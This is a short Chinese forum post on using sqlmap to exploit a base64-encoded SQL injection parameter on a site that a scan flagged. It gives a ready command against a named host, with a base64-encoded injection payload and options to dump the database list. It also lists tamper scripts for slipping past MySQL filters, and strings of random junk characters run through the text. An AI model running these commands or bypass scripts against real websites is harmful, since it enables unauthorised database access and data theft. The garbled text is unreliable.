| WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢? sqlmap的tamper里有个base64encode.py. D+ a" l6 [3 e: b ! h$ C# r, g/ ?, k, C$ A" l. t 使用如下 * J J3 o5 z% S& J9 F' d sqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs & ^, t& }5 }, z7 \& o 5 _# k& N5 B- X6 H sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”3 T* l$ ~% U+ Y; o8 H' P; {0 c3 S % E8 l E3 @) p# e6 N5 @0 ^ 其中常用到的bypass脚本绕过SQLMAP主要两个脚本: space2hash.py ,对于MYSQL数据库 4.0, 5.0注入 space2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入" f5 _4 t0 r. L4 T 首先确定目标数据库版本,然后选择相应的脚本。 -v 3 --batch --tamper "space2hash.py" 还有其他一些插件: encodes编码 ——charencode.py! X" H, C; `6 [' p m base64编码 —— base64encode.py/ a) h& q1 b4 i' a3 R. ^9 V 替换空格和关键字 —— halfversionedmorekeywords.py% ?& k: {' i7 ?1 H3 e8 K2 o |
| 欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) | Powered by Discuz! X3.2 |